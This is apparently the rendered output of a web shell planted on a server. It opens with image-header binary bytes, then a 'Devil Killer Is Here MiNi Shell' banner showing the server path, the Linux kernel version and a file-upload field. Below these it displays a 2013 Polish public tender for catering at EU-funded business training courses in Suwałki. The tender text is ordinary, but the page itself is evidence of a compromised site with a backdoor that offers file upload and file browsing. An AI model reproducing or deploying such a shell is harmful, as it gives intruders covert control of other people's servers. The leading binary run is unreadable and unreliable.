JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131025/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131025/436116-N-2013.html

<p class="kh_header"><b>Suwałki: usługi żywienia podczas szkoleń realizowanych w ramach projektu pt.: Business class podlaskiego biznesu nr WND-POKL.08.01.01-20-096-12</b><br>
<b>Numer ogłoszenia: 436116 - 2013; data zamieszczenia: 25.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Rozwoju Regionalnego ARES S.A. w Suwałkach , ul. Teofila Noniewicza 42A, 16-400 Suwałki, woj. podlaskie, tel. 87 5666106, faks 87 5667497.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ares.suwalki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> usługi żywienia podczas szkoleń realizowanych w ramach projektu pt.: Business class podlaskiego biznesu nr WND-POKL.08.01.01-20-096-12.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> usługi żywienia podczas szkoleń realizowanych w ramach projektu pt.: Business class podlaskiego biznesu nr WND-POKL.08.01.01-20-096-12. Zadanie 1: usługa żywienia podczas szkolenia Ekokwalifikacje organizowanego  w ramach projektu pt.  Business class podlaskiego biznesu nr WND-POKL.08.01.01-20-096-12.Zadanie 2: usługa żywienia podczas szkolenia Firma w Internecie organizowanego  w ramach projektu pt.  Business class podlaskiego biznesu nr WND-POKL.08.01.01-20-096-12.Zadanie 3: usługa żywienia podczas szkolenia Skuteczny sprzedawca - skuteczna sprzedaż organizowanego  w ramach projektu pt. Business class podlaskiego biznesu nr WND-POKL.08.01.01-20-096-12.Zadanie 4: usługa żywienia podczas szkolenia Ecodriving organizowanego  w ramach projektu pt. Business class podlaskiego biznesu nr WND-POKL.08.01.01-20-096-12.Zadanie 5: usługa żywienia podczas szkolenia Pakiet szkoleń specjalistycznych z zakresu mechaniki i użytkowania organizowanego  w ramach projektu pt. Business class podlaskiego biznesu nr WND-POKL.08.01.01-20-096-12..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.30.00.00-3, 55.32.10.00-6, 55.52.12.00-0, 55.52.00.00-1, 55.32.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełnienia tego warunku na podstawie analizy oświadczenia o spełnieniu warunków udziału w postępowaniu złożonego przez wykonawcę.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełnienia tego warunku na podstawie analizy oświadczenia o spełnieniu warunków udziału w postępowaniu złożonego przez wykonawcę.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełnienia tego warunku na podstawie analizy oświadczenia o spełnieniu warunków udziału w postępowaniu złożonego przez wykonawcę.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełnienia tego warunku na podstawie analizy oświadczenia o spełnieniu warunków udziału w postępowaniu złożonego przez wykonawcę.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustanawia szczegółowego warunku w tym zakresie. Zamawiający dokona oceny spełnienia tego warunku na podstawie analizy oświadczenia o spełnieniu warunków udziału w postępowaniu złożonego przez wykonawcę.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Projekt umowy stanowiący załącznik o nr 5 do SIWZ jest integralną częścią niniejszej dokumentacji i zapisy w niej zawarte traktuje się jako warunki udzielenia zamówienia.Stosownie do art. 144 ustawy, Zamawiający zastrzega sobie możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której wybrano Wykonawcę, polegającej na:a)zmianie osób wyznaczonych do uzgodnień i koordynacji przedmiotu niniejszej umowy,b)sprostowania oczywistych omyłek pisarskich i rachunkowych,c)zmianie liczebności uczestników na mniejszą (w przypadku nie podjęcia kursu przez osobę skierowaną na kurs, rezygnacji kandydata-tki z kursu mimo wcześniejszych deklaracji uczestnictwa w kursie lub niestawienia się kandydata-tki na kursie pomimo wezwania Zamawiającego), d)zmianie terminu realizacji zamówienia z przyczyn niezależnych od Zamawiającego jak również Wykonawcy,w przypadku wystąpienia zdarzeń losowych.
Konieczności zmiany terminu realizacji przedmiotu umowy z przyczyn niezawinionych przez strony nie może spowodować zmiany ceny wynikającej z oferty, na podstawie której był dokonany wybór Wykonawcy. Ponadto  Zamawiający przewiduje możliwość zmiany umowy w przypadku:
- gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizacje przedmiotu umowy; 
- gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych lub zaleceń Instytucji, która przyznała środki na sfinansowanie umowy;- zaistnienia siły wyższej (powódź, pożar, zamieszki, strajki, ataki terrorystyczne, przerwy w dostawie energii elektrycznej) mającej wpływ na realizację umowy. Zmiana postanowień zawartej umowy może nastąpić wyłącznie w przypadkach przewidzianych ustawą oraz postanowieniami niniejszej Specyfikacji istotnych warunków zamówienia, za zgodą obu Stron wyrażoną na piśmie w formie aneksu do umowy, pod rygorem nieważności takiej zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ares.suwalki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Rozwoju Regionalnego ARES S.A. w Suwałkach, ul. T. Noniewicza 42 a, 16-400 Suwałki, od poniedziałku do piątku, godziny urzędowania od 07:00 do 15:00..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.11.2013 godzina 08:00, miejsce: Agencja Rozwoju Regionalnego ARES S.A. w Suwałkach, ul. T. Noniewicza 42 a, 16-400 Suwałki,sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Business class podlaskiego biznesu nr WND-POKL.08.01.01-20-096-12.
Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego - Programu Operacyjnego Kapitał Ludzki, Priorytetu VIII Regionalne kadry gospodarki, Działania 8.1 Rozwój pracowników i przedsiębiorstw w regionie, Poddziałania 8.1.1 Wsparcie rozwoju kwalifikacji zawodowych i doradztwo dla przedsiębiorstw..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> usługa żywienia podczas szkolenia Ekokwalifikacje organizowanego  w ramach projektu pt.  Business class podlaskiego biznesu nr WND-POKL.08.01.01-20-096-12..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Poprzez świadczenie usług żywienia Zamawiający rozumie usługę przygotowywania, dostarczania i podawania posiłków w miejscu wskazanym przez Zamawiającego.Świadczenie usług żywienia będzie odbywało się w oparciu o poszczególne zlecenia wystawiane przez upoważnionego pracownika Zamawiającego, w okresie obowiązywania umowy (tj. od dnia zawarcia umowy do dnia 31.12.2013 r.), w ramach organizowanego szkolenia.W ramach zamówienia Wykonawca zobowiązany jest do:
a.przygotowania, dowozu i podania posiłków w terminie (dzień, godzina) i miejscu, w którym będzie odbywało się szkolenie,
b.przestrzegania przepisów prawnych w zakresie przechowywania i przygotowywania artykułów spożywczych (m.in. ustawy z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienia Dz.U. z 2010r. Nr 136 poz. 914 ze zm.),
c.świadczenia usługi wyłącznie przy użyciu produktów spełniających normy jakości produktów spożywczych,
d.dostarczenia własnych naczyń, sztućców odpowiednio do liczby uczestników szkolenia;  Użyte naczynia winny być czyste, nieuszkodzone;
e.zapewnienia osób, które przygotują usługę oraz uprzątną i wywiozą pozostałości po zakończonej usłudze,
f.estetycznego podawania posiłków,
g.dostarczania posiłków na miejsce wskazanie przez Zamawiającego najpóźniej na 30 min. przed rozpoczęciem szkolenia- kursu;
h.zebrania naczyń oraz resztek pokonsumpcyjnych; uprzątnięcia i wywiezienia wszystkich śmieci pozostałych po posiłkach.
4.Zamawiający każdorazowo, zlecając wykonanie poszczególnych usług, określi dokładnie termin  (z podaniem daty i godzin świadczenia usługi), miejsce, liczbę uczestników oraz rodzaj menu, przy uwzględnieniu, że:szacunkowa liczebność grupy szkoleniowej: 46 osób, łączna liczba dni szkoleniowych: 3 dni,szacunkowa ilość zestawów: 138 zestawów (jako zestaw rozumie się przerwę kawową + lunch, o którym mowa w pkt. 6, 7, 8) miejsce świadczenia usługi:  Suwałki
5.W przypadku nie podjęcia szkolenia przez osobę skierowaną na szkolenie, rezygnacji kandydata-tki ze szkolenia mimo wcześniejszych deklaracji uczestnictwa lub niestawienia się kandydata-tki na szkoleniu pomimo wezwania Zamawiającego, Wykonawca jest zobowiązany do skalkulowania kosztu usługi żywienia, który stanowić będzie iloczyn kosztu usługi żywienia dla jednej osoby oraz rzeczywistej liczby osób, które korzystały z usługi żywienia. W ramach świadczonej usługi, Wykonawca będzie zobowiązany do zorganizowania:przerwy kawowej  23% VAT;lunchu  8% VAT.
7.W ramach usługi, o której mowa w punkcie 6a, Wykonawca będzie zobowiązany do zapewnienia każdej osobie uczestniczącej w szkoleniu, co najmniej:a) 1 filiżanki kawy rozpuszczalnej 250 ml;b) 1 filiżanki herbaty czarnej 250 ml;c) Ciastka (minimum dwa rodzaje - po 5 szt. każdego rodzaju);d) Cukier biały 20g, e) Cytryna (pokrojona, podawana na talerzykach) 1plaster,f) Mleko 30 ml ,g) Woda gazowana i niegazowana, w butelkach 0,5 l, 1 szt.
8.W ramach usługi, o której mowa w punkcie 6b, Wykonawca zobowiązany będzie   do zapewnienia każdej osobie uczestniczącej w szkoleniu: 
Dzień	Zestawy obiadowe:1. Karkówka po myśliwsku 120g os, Ziemniaki z koperkiem 200g os, Surówka z białej kapusty 150g os, Napój owocowy 300mlos. 2.Zrazy wieprzowe 200g os, Kasza gryczana 200g os, Buraczki czerwona na ciepło 150g os, Napój owocowy 300ml os. 3.Roladki drobiowe z farszem mięsnym 200g os, Ziemniaki z koperkiem 200g os, Jarzynka z marchewki z groszkiem na maśle 150g os,Napój owocowy 300ml os.
9.Dania winny być podawane na gorąco.10.Zamawiający zastrzega sobie w trakcie realizacji usługi prawo do zgłaszania uwag, które Wykonawca zobowiązany będzie uwzględnić.11.Wykonawca zobowiązuje się do wskazania Zamawiającemu osób do kontaktu oraz koordynujących realizację zamówienia i odpowiedzialnych za catering podczas szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.30.00.00-3, 55.32.10.00-6, 55.52.12.00-0, 55.52.00.00-1, 55.32.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> usługa żywienia podczas szkolenia Firma w Internecie organizowanego  w ramach projektu pt.  Business class podlaskiego biznesu nr WND-POKL.08.01.01-20-096-12..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Poprzez świadczenie usług żywienia Zamawiający rozumie usługę przygotowywania, dostarczania i podawania posiłków w miejscu wskazanym przez Zamawiającego.
2.Świadczenie usług żywienia będzie odbywało się w oparciu o poszczególne zlecenia wystawiane przez upoważnionego pracownika Zamawiającego, w okresie obowiązywania umowy (tj. od dnia zawarcia umowy do dnia 31.12.2013 r.), w ramach organizowanego szkolenia.
3.W ramach zamówienia Wykonawca zobowiązany jest do:a.przygotowania, dowozu i podania posiłków w terminie (dzień, godzina) i miejscu, w którym będzie odbywało się szkolenie,b.przestrzegania przepisów prawnych w zakresie przechowywania i przygotowywania artykułów spożywczych (m.in. ustawy z dnia 25 sierpnia 2006r. o bezpieczeństwie żywności i żywienia Dz.U. z 2010r. Nr 136 poz. 914 ze zm.),c.świadczenia usługi wyłącznie przy użyciu produktów spełniających normy jakości produktów spożywczych,d.dostarczenia własnych naczyń, sztućców odpowiednio do liczby uczestników szkolenia;  Użyte naczynia winny być czyste, nieuszkodzone;e.zapewnienia osób, które przygotują usługę oraz uprzątną i wywiozą pozostałości po zakończonej usłudze,f.estetycznego podawania posiłków,g.dostarczania posiłków na miejsce wskazanie przez Zamawiającego najpóźniej na 30 min. Przed rozpoczęciem szkolenia/ kursu;
h.zebrania naczyń oraz resztek pokonsumpcyjnych; uprzątnięcia i wywiezienia wszystkich śmieci pozostałych po posiłkach.
4.Zamawiający każdorazowo, zlecając wykonanie poszczególnych usług, określi dokładnie termin  (z podaniem daty i godzin świadczenia usługi), miejsce, liczbę uczestników oraz rodzaj menu, przy uwzględnieniu, że: szacunkowa liczebność grupy szkoleniowej: 6 osób, łączna liczba dni szkoleniowych: 13 dni,szacunkowa ilość zestawów: 78 zestawów (jako zestaw rozumie się przerwę kawową + lunch, o którym mowa w pkt. 6, 7, 8), miejsce świadczenia usługi:  Suwałki. 5.W przypadku nie podjęcia szkolenia przez osobę skierowaną na szkolenie, rezygnacji kandydata/tki zeszkolenia mimo wcześniejszych deklaracji uczestnictwa lub niestawienia się kandydata/tki na szkoleniu pomimo wezwania Zamawiającego, Wykonawca jest zobowiązany do skalkulowania kosztu usługi żywienia, który stanowić będzie iloczyn kosztu usługi żywienia dla jednej osoby oraz rzeczywistej liczby osób, które korzystały z usługi żywienia. 6.W ramach świadczonej usługi, Wykonawca będzie zobowiązany do zorganizowania:a) przerwy kawowej  23% VAT;b) lunchu  8% VAT.
7.	W ramach usługi, o której mowa w punkcie 6a, Wykonawca będzie zobowiązany do zapewnienia każdej osobie uczestniczącej w szkoleniu, co najmniej:a) 1 filiżanki kawy rozpuszczalnej 250 ml;b) 1 filiżanki herbaty czarnej 250 ml;c) Ciastka (minimum dwa rodzaje - po 5 szt. Każdego rodzaju);d) Cukier biały 20g, e) Cytryna (pokrojona, podawana na talerzykach) 1plaster,f) Mleko 30 ml 
g) Woda gazowana i niegazowana, w butelkach 0,5 l, 1 szt.8.W ramach usługi, o której mowa w punkcie 6b, Wykonawca zobowiązany będzie   do zapewnienia każdej osobie uczestniczącej w szkoleniu: 
Dzień	Zestawy obiadowe:1. Karkówka po myśliwsku 120g os, Ziemniaki z koperkiem 200g os,Surówka z białej kapusty 150g os, Napój owocowy 300ml os,2.Zrazy wieprzowe 200g os, Kasza gryczana 200g os, Buraczki czerwona na ciepło 150g os, Napój owocowy 300ml os. 3.Baba ziemniaczana w sosie śmietanowo - grzybowym, Surówka z kapusty czerwonej 150g os, Napój owocowy 300ml os. 4.Roladki drobiowe z farszem mięsnym 200g os, Ziemniaki z koperkiem 200g os, Jarzynka z marchewki z groszkiem na maśle 150g os,Napój owocowy 300ml os.
5. Gulasz wieprzowy z warzywami 120 g os, Kasza gryczana 200g os,Ogórek kiszony 150 g os, Napój owocowy 300 ml os. 6. Schabowy panierowany 150 g os, Ziemniaki z koperkiem 200g os, Kapusta zasmażana 200 g os, Napój owocowy 300 ml os.7. Filet rybny panierowany 150 g os, Ryż na sypko 200g os, Surówka z kapusty kiszonej 150 g os, Napój owocowy 300 ml os.8.Pieczeń wieprzowa w sosie korzennym 200 g os, Ziemniaki z koperkiem 200g os, Surówka z kapusty pekińskiej 150 g os, Napój owocowy 300 ml os.9. Karkówka po myśliwsku 120g os
Ziemniaki z koperkiem 200g os, Surówka z białej kapusty 150g os, Napój owocowy 300ml os.10.Zrazy wieprzowe 200g os.Kasza gryczana 200g os. Buraczki czerwona na ciepło 150g os, Napój owocowy 300ml os.
11.Baba ziemniaczana w sosie śmietanowo - grzybowym, Surówka z kapusty czerwonej 150g os,Napój owocowy 300ml os. 12. Roladki drobiowe z farszem mięsnym 200g os, Ziemniaki z koperkiem 200g os, Jarzynka z marchewki z groszkiem na maśle 150g os, Napój owocowy 300ml os. 13. Gulasz wieprzowy z warzywami 120 g os, Kasza gryczana 200g os, Ogórek kiszony 150 g os, Napój owocowy 300 ml os. 
9.Dania winny być podawane na gorąco.10.Zamawiający zastrzega sobie w trakcie realizacji usługi prawo do zgłaszania uwag, które Wykonawca zobowiązany będzie uwzględnić.11.Wykonawca zobowiązuje się do wskazania Zamawiającemu osób do kontaktu oraz koordynujących realizację zamówienia i odpowiedzialnych za catering podczas szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.30.00.00-3, 55.32.10.00-6, 55.52.12.00-0, 55.52.00.00-1, 55.32.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> usługa żywienia podczas szkolenia Skuteczny sprzedawca - skuteczna sprzedaż organizowanego  w ramach projektu pt.  Business class podlaskiego biznesu nr WND-POKL.08.01.01-20-096-12..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Poprzez świadczenie usług żywienia Zamawiający rozumie usługę przygotowywania, dostarczania i podawania posiłków w miejscu wskazanym przez Zamawiającego.
2. Świadczenie usług żywienia będzie odbywało się w oparciu o poszczególne zlecenia wystawiane przez upoważnionego pracownika Zamawiającego, w okresie obowiązywania umowy (tj. od dnia zawarcia umowy do dnia 31.12.2013 r.), w ramach organizowanego szkolenia.
